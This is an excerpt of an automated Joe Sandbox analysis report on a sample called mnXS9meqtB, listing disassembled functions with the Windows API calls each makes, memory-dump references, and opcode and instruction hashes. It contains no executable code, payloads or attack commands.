                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                            • String ID:
                                                                            • API String ID: 3137044355-0
                                                                            • Opcode ID: 7959393a54a0fc2d4256816b315818988b2b9376e8dc37491e8eb6a9db8637ad
                                                                            • Instruction ID: b000c8599123cf56a9bb37d0f737255605e9847a6bfae129529bc904d5ee3847
                                                                            • Opcode Fuzzy Hash: 7959393a54a0fc2d4256816b315818988b2b9376e8dc37491e8eb6a9db8637ad
                                                                            • Instruction Fuzzy Hash: 5E215971A00209ABDB269F95DC88ADABBFCEF40700F0184A9A6179A050DB78FA559B50
                                                                            Function 00346713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00346733
                                                                            • _memset.LIBCMT ref: 00346754
                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003467A6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 003467AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                            • String ID:
                                                                            • API String ID: 1157408455-0
                                                                            • Opcode ID: d0f5c0fc5bf937b906e6d2c48c215d901afe91168b90c3ebccb7ba41fec7f390
                                                                            • Instruction ID: 683b390c0cef7fd557a4ad6aeddd09d594ffde6d66d45f14da17e0f52976e091
                                                                            • Opcode Fuzzy Hash: d0f5c0fc5bf937b906e6d2c48c215d901afe91168b90c3ebccb7ba41fec7f390
                                                                            • Instruction Fuzzy Hash: 8A110A759012287AE7316BA5AC4DFABBBBCEF45724F1041DAF504E71D0D2705E808B65
                                                                            Function 0033B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0033AA79
                                                                              • Part of subcall function 0033AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0033AA83
                                                                              • Part of subcall function 0033AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0033AA92
                                                                              • Part of subcall function 0033AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0033AA99
                                                                              • Part of subcall function 0033AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0033AAAF
                                                                            • GetLengthSid.ADVAPI32(?,00000000,0033ADE4,?,?), ref: 0033B21B
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0033B227
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0033B22E
                                                                            • CopySid.ADVAPI32(?,00000000,?), ref: 0033B247
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                            • String ID:
                                                                            • API String ID: 4217664535-0
                                                                            • Opcode ID: 299cb1670b74124e37cc6b14bf050bc2201b63883a1c054a5b82a8a756e3052d
                                                                            • Instruction ID: c0095493a2689f7cff1629595df72ec9ed69400c259119ba5808d3f5b1cf8b7a
                                                                            • Opcode Fuzzy Hash: 299cb1670b74124e37cc6b14bf050bc2201b63883a1c054a5b82a8a756e3052d
                                                                            • Instruction Fuzzy Hash: FF119DB1A00205AFCB069F94DC84AAFF7A9EF84314F14846EEA42D7250D731AE44CB10
                                                                            Function 0033B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0033B498
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4AA
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4C0
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: b01ba297d08eebaa7f8c0ca121c655e7904eafee28d0025a477724a89ea3a3a0
                                                                            • Instruction ID: b080ceec46d0316d25ad50b6b52d1f53565d2380b7353ddc7945d2d39644fe6a
                                                                            • Opcode Fuzzy Hash: b01ba297d08eebaa7f8c0ca121c655e7904eafee28d0025a477724a89ea3a3a0
                                                                            • Instruction Fuzzy Hash: 25115A7A900218FFDB11DFA9C981E9DFBB8FB08700F204091E604B7290D771AE10DB94
                                                                            Function 0031B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0031B5A5
                                                                            • GetClientRect.USER32(?,?), ref: 0037E69A
                                                                            • GetCursorPos.USER32(?), ref: 0037E6A4
                                                                            • ScreenToClient.USER32(?,?), ref: 0037E6AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: f711ef5cba15f242d4a27ad8d86e35ff47e2b2f04e842ca1b15852c10c54f470
                                                                            • Instruction ID: 79867d2e9296543633e620b4240c41c194e1822dde17ad725a82320f60c5a6e4
                                                                            • Opcode Fuzzy Hash: f711ef5cba15f242d4a27ad8d86e35ff47e2b2f04e842ca1b15852c10c54f470
                                                                            • Instruction Fuzzy Hash: 27113631900129BBCB16DF94D8459EEB7BDEB0A304F104495E901E7141D334AA91DBA1
                                                                            Function 0034732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00347352
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00347385
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0034739B
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003473A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: 8656b9aa61772d131841636c8ed18f6cb615c476bfdb952d7a6d52fd6fa81942
                                                                            • Instruction ID: abc4b2b786a8f83ec261b0dbedea95287aeba34274df288fee32b51cfc8030d4
                                                                            • Opcode Fuzzy Hash: 8656b9aa61772d131841636c8ed18f6cb615c476bfdb952d7a6d52fd6fa81942
                                                                            • Instruction Fuzzy Hash: 7D11A176A04214ABCB039FACDC09E9E7BED9B49310F148255F925D72A1D770AE009BA1
                                                                            Function 0031D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                            • GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: f1c3de79d06874752acdb2819695c5bd8d61794666a4df43feae455eb4125df1
                                                                            • Instruction ID: 6a53a87e4b393a2c0286cac04008541c96600de7e52fdbb5c0a56c8236609427
                                                                            • Opcode Fuzzy Hash: f1c3de79d06874752acdb2819695c5bd8d61794666a4df43feae455eb4125df1
                                                                            • Instruction Fuzzy Hash: 7A118B72101609BFEB574F909C54EEABB6DFF0A364F054121FA0552050C731DCA0ABA0
                                                                            Function 00334DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                            • Instruction ID: ee358b9a143e8d108e0fb1708a75722a5a0ba282c0a45a2f15ade0c3fba16749
                                                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                            • Instruction Fuzzy Hash: D101483600014ABBCF135F84DC818EE3F26BB18351F598555FA2859131D336EAB2AB81
                                                                            Function 00327452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00327A0D: __getptd_noexit.LIBCMT ref: 00327A0E
                                                                            • __lock.LIBCMT ref: 0032748F
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 003274AC
                                                                            • _free.LIBCMT ref: 003274BF
                                                                            • InterlockedIncrement.KERNEL32(00D26D80), ref: 003274D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 2704283638-0
                                                                            • Opcode ID: 5ce83c2f97fa5bf4623f83223e66ca9e7bc61c719a8d183ca091988d3ac96937
                                                                            • Instruction ID: c3b36b89f0b73afb9178f3349d41a33ec19dff5e1fd9f1922264df0735116963
                                                                            • Opcode Fuzzy Hash: 5ce83c2f97fa5bf4623f83223e66ca9e7bc61c719a8d183ca091988d3ac96937
                                                                            • Instruction Fuzzy Hash: 6201B536909F31ABC723BF66B90675DBB64BF04714F164109F818ABA91CB346941CFD2
                                                                            Function 0036EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                              • Part of subcall function 0031AF83: BeginPath.GDI32(?), ref: 0031B009
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0036EA8E
                                                                            • LineTo.GDI32(00000000,?,?), ref: 0036EA9B
                                                                            • EndPath.GDI32(00000000), ref: 0036EAAB
                                                                            • StrokePath.GDI32(00000000), ref: 0036EAB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 557a6a8e49d7bf007a62e7c8da6b3f289a059bc6a563c0ab5bec376da4cbeda7
                                                                            • Instruction ID: 2eebdf71a597ecfc0389686751f2bdcfec5b39bc7dff5ac9f977c8c9c51ad701
                                                                            • Opcode Fuzzy Hash: 557a6a8e49d7bf007a62e7c8da6b3f289a059bc6a563c0ab5bec376da4cbeda7
                                                                            • Instruction Fuzzy Hash: 85F05E31005259BBDB13AF94AC0DFCA3F1EAF06311F044241FE11A50E187745666DB95
                                                                            Function 0033C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0033C84A
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0033C85D
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0033C864
                                                                            • AttachThreadInput.USER32(00000000), ref: 0033C86B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: bf7fb2051733017cd41370bcdd9989575c14191999cbd2f6b5f555f725d81ad2
                                                                            • Instruction ID: 062db5dbacc9e329ebd6affd11cddd2c4248528570b08009fdff99ac1cd71fc3
                                                                            • Opcode Fuzzy Hash: bf7fb2051733017cd41370bcdd9989575c14191999cbd2f6b5f555f725d81ad2
                                                                            • Instruction Fuzzy Hash: CCE06D71141328BADB221BA2DC4DEDB7F1CEF067A1F408061B60D984A1D6B1C681CBE0
                                                                            Function 0033B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 0033B0D6
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0033AC9D), ref: 0033B0DD
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0033AC9D), ref: 0033B0EA
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0033AC9D), ref: 0033B0F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 39ff15dfa035e89d9af8f36bd42ec2ed675965b8d5c8658d8cd4d1a781684f58
                                                                            • Instruction ID: 2ca799ccd3323272b605e66ff99362437aac9996e215966e95c67a67bb724a35
                                                                            • Opcode Fuzzy Hash: 39ff15dfa035e89d9af8f36bd42ec2ed675965b8d5c8658d8cd4d1a781684f58
                                                                            • Instruction Fuzzy Hash: 64E086726013119BD7212FB15C0CF477BADEF55795F128858F341DA0C0DB748401C761
                                                                            Function 0031B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0031B496
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 0031B4A0
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0031B4B5
                                                                            • GetStockObject.GDI32(00000005), ref: 0031B4BD
                                                                            • GetWindowDC.USER32(?,00000000), ref: 0037DE2B
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037DE38
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0037DE51
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0037DE6A
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0037DE8A
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0037DE95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: b8a5130762fbe140af5f9f457e6792e30bc6bd64bef0e7c28faaa5339fe98fb2
                                                                            • Instruction ID: 282326b6ca48baec52cd76546d5191e8ee27ff2e16be12acb754efefc54a58e6
                                                                            • Opcode Fuzzy Hash: b8a5130762fbe140af5f9f457e6792e30bc6bd64bef0e7c28faaa5339fe98fb2
                                                                            • Instruction Fuzzy Hash: A8E0ED31100340AADF636B74EC4DBD87B26AF56335F14C6A6F669580E1C7754981DB11
                                                                            Function 0037B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 11eb5ae904cf0fe54e040fce98928eea51e1f697836511192884146f749e8aed
                                                                            • Instruction ID: 254fc81a0aeada9fede5513062d78e346640daa8935e5b5c543261224f7c2c9c
                                                                            • Opcode Fuzzy Hash: 11eb5ae904cf0fe54e040fce98928eea51e1f697836511192884146f749e8aed
                                                                            • Instruction Fuzzy Hash: 6DE04FB1100308EFDB026F70DC48A6E7BADFB4C350F11C845FD5A8B291DB7898408B40
                                                                            Function 0033B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0033B2DF
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0033B2EB
                                                                            • CloseHandle.KERNEL32(?), ref: 0033B2F4
                                                                            • CloseHandle.KERNEL32(?), ref: 0033B2FC
                                                                              • Part of subcall function 0033AB24: GetProcessHeap.KERNEL32(00000000,?,0033A848), ref: 0033AB2B
                                                                              • Part of subcall function 0033AB24: HeapFree.KERNEL32(00000000), ref: 0033AB32
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 31b126ecb70b54ca3aebb05019681466d6012c5e2b0faa78ab254ea2b6ad216a
                                                                            • Instruction ID: 875c17dc6fa2ee5b441f9779c3be62b05e212cf32ad765ca25931380e2af03eb
                                                                            • Opcode Fuzzy Hash: 31b126ecb70b54ca3aebb05019681466d6012c5e2b0faa78ab254ea2b6ad216a
                                                                            • Instruction Fuzzy Hash: 36E0EC3A104505BFDB033FA5EC08859FFBAFF98321B108661F625815B1CB72A871EB91
                                                                            Function 0037B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
